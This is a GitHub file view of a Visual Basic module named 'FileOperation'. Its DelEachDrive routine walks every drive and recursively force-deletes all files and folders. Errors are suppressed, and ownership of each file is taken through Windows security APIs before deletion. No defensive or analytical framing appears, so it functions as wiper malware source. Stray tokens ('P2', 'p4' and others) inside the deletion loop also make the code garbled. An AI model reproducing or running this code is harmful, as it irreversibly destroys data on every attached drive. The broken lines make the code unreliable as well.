-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathFile.bas
57 lines (43 loc) · 1.99 KB
/
File.bas
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
Attribute VB_Name = "FileOperation"
Private Declare Function SetFileSecurity Lib "advapi32.dll" Alias "SetFileSecurityA" (ByVal lpFileName As String, ByVal SecurityInformation As Long, pSecurityDescriptor As Any) As Long
Private Declare Function GetFileSecurity Lib "advapi32.dll" Alias "GetFileSecurityA" (ByVal lpFileName As String, ByVal RequestedInformation As Long, pSecurityDescriptor As Any, ByVal nLength As Long, lpnLengthNeeded As Long) As Long
Private Declare Function InitializeSecurityDescriptor Lib "advapi32.dll" (pSecurityDescriptor As Any, ByVal dwRevision As Long) As Long
Private Declare Function SetSecurityDescriptorOwner Lib "advapi32.dll" (pSecurityDescriptor As Any, pOwner As Any, ByVal bOwnerDefaulted As Long) As Long
Private Const OWNER_SECURITY_INFORMATION = &H1
Public Sub TakeOwnership(ByVal sFileName As String)
Dim lResult As Long
Dim lLengthNeeded As Long
Dim tSD(0 To 1023) As Byte
Dim tOwner(0 To 1023) As Byte
Call InitializeSecurityDescriptor(tSD(0), 1)
Call SetSecurityDescriptorOwner(tSD(0), ByVal VarPtr(tOwner(0)), 0)
lResult = GetFileSecurity(sFileName, OWNER_SECURITY_INFORMATION, tSD(0), 1024, lLengthNeeded)
lResult = SetFileSecurity(sFileName, OWNER_SECURITY_INFORMATION, tSD(0))
End Sub
Sub DelEachDrive()
On Error Resume Next
Dim a As New FileSystemObject, b As Drive
For Each b In a.Drives
DeleteFolder b.rootfolder.Path
Next
End Sub
Sub DeleteFolder(Path As String)
Dim fso As New FileSystemObject, folder As folder, subfolder As folder, file As file
On Error Resume Next
Set folder = fso.GetFolder(Path)
For Each subfolder In folder.SubFolders
DeleteFolder subfolder.Path
Next
For Each file In folder.Files
file.Attributes = Normal
TakeOwnership file.path
file.Delete True
P2
p4
p5
p7
p8
p9
Next
folder.Delete True
End Sub